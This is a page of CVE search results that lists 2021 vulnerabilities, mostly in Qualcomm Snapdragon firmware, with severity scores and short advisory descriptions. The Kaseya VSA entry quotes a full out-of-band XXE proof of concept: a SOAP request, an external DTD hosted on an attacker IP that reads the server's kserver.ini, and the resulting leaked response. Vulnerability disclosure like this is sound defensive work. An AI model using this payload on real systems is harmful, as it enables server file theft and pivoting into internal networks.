Export limit exceeded: 339825 CVEs match your query. Please refine your search to export 10,000 CVEs or fewer.
Search
Search Results (2907 CVEs found)
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2021-30353 | 1 Qualcomm | 220 Ar8031, Ar8031 Firmware, Ar8035 and 217 more | 2024-11-21 | 7.5 High |
| Improper validation of function pointer type with actual function signature can lead to assertion in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice & Music, Snapdragon Wearables | ||||
| CVE-2021-30340 | 1 Qualcomm | 106 Ar8035, Ar8035 Firmware, Qca6390 and 103 more | 2024-11-21 | 7.5 High |
| Reachable assertion due to improper validation of coreset in PDCCH configuration in SA mode in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile | ||||
| CVE-2021-30335 | 1 Qualcomm | 348 Apq8009w, Apq8009w Firmware, Aqt1000 and 345 more | 2024-11-21 | 8.4 High |
| Possible assertion in QOS request due to improper validation when multiple add or update request are received simultaneously in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking | ||||
| CVE-2021-30332 | 1 Qualcomm | 110 Ar8035, Ar8035 Firmware, Qca6390 and 107 more | 2024-11-21 | 7.5 High |
| Possible assertion due to improper validation of OTA configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile | ||||
| CVE-2021-30329 | 1 Qualcomm | 106 Ar8035, Ar8035 Firmware, Qca6390 and 103 more | 2024-11-21 | 7.5 High |
| Possible assertion due to improper validation of TCI configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile | ||||
| CVE-2021-30328 | 1 Qualcomm | 96 Ar8035, Ar8035 Firmware, Qca6390 and 93 more | 2024-11-21 | 7.5 High |
| Possible assertion due to improper validation of invalid NR CSI-IM resource configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile | ||||
| CVE-2021-30326 | 1 Qualcomm | 106 Ar8035, Ar8035 Firmware, Qca6390 and 103 more | 2024-11-21 | 7.5 High |
| Possible assertion due to improper size validation while processing the DownlinkPreemption IE in an RRC Reconfiguration/RRC Setup message in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile | ||||
| CVE-2021-30307 | 1 Qualcomm | 172 Ar8035, Ar8035 Firmware, Csrb31024 and 169 more | 2024-11-21 | 7.5 High |
| Possible denial of service due to improper validation of DNS response when DNS client requests with PTR, NAPTR or SRV query type in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT | ||||
| CVE-2021-30293 | 1 Qualcomm | 152 Ar6003, Ar6003 Firmware, Ar8035 and 149 more | 2024-11-21 | 7.5 High |
| Possible assertion due to lack of input validation in PUSCH configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT | ||||
| CVE-2021-30287 | 1 Qualcomm | 116 Ar8035, Ar8035 Firmware, Qca6390 and 113 more | 2024-11-21 | 7.5 High |
| Possible assertion due to improper validation of symbols configured for PDCCH monitoring in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile | ||||
| CVE-2021-30273 | 1 Qualcomm | 148 Apq8009w, Apq8009w Firmware, Apq8096au and 145 more | 2024-11-21 | 7.5 High |
| Possible assertion due to improper handling of IPV6 packet with invalid length in destination options header in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables | ||||
| CVE-2021-30245 | 1 Apache | 1 Openoffice | 2024-11-21 | 8.8 High |
| The project received a report that all versions of Apache OpenOffice through 4.1.8 can open non-http(s) hyperlinks. The problem has existed since about 2006 and the issue is also in 4.1.9. If the link is specifically crafted this could lead to untrusted code execution. It is always best practice to be careful opening documents from unknown and unverified sources. The mitigation in Apache OpenOffice 4.1.10 (unreleased) assures that a security warning is displayed giving the user the option of continuing to open the hyperlink. | ||||
| CVE-2021-30201 | 1 Kaseya | 1 Vsa | 2024-11-21 | 7.5 High |
| The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network. | ||||
| CVE-2021-30137 | 1 Axiossystems | 1 Assyst | 2024-11-21 | 7.7 High |
| Assyst 10 SP7.5 has authenticated XXE leading to SSRF via XML unmarshalling. The application allows users to send JSON or XML data to the server. It was possible to inject malicious XML data through several access points. | ||||
| CVE-2021-30006 | 1 Jetbrains | 1 Intellij Idea | 2024-11-21 | 7.5 High |
| In IntelliJ IDEA before 2020.3.3, XXE was possible, leading to information disclosure. | ||||
| CVE-2021-2401 | 1 Oracle | 1 Bi Publisher | 2024-11-21 | 5.3 Medium |
| Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite - XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | ||||
| CVE-2021-29965 | 1 Mozilla | 1 Firefox | 2024-11-21 | 5.3 Medium |
| A malicious website that causes an HTTP Authentication dialog to be spawned could trick the built-in password manager to suggest passwords for the currently active website instead of the website that triggered the dialog. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 89. | ||||
| CVE-2021-29868 | 1 Ibm | 1 I2 Ibase | 2024-11-21 | 5.5 Medium |
| IBM i2 iBase 8.9.13 and 9.0.0 could allow a local attacker to obtain sensitive information due to insufficient session expiration. IBM X-Force ID: 206213. | ||||
| CVE-2021-29846 | 1 Ibm | 1 Security Guardium Insights | 2024-11-21 | 2.7 Low |
| IBM Security Guardium Insights 3.0 could allow an authenticated user to obtain sensitive information due to insufficient session expiration. IBM X-Force ID: 205256. | ||||
| CVE-2021-29831 | 1 Ibm | 2 Jazz For Service Management, Tivoli Netcool\/omnibus Gui | 2024-11-21 | 8.1 High |
| IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 204775. | ||||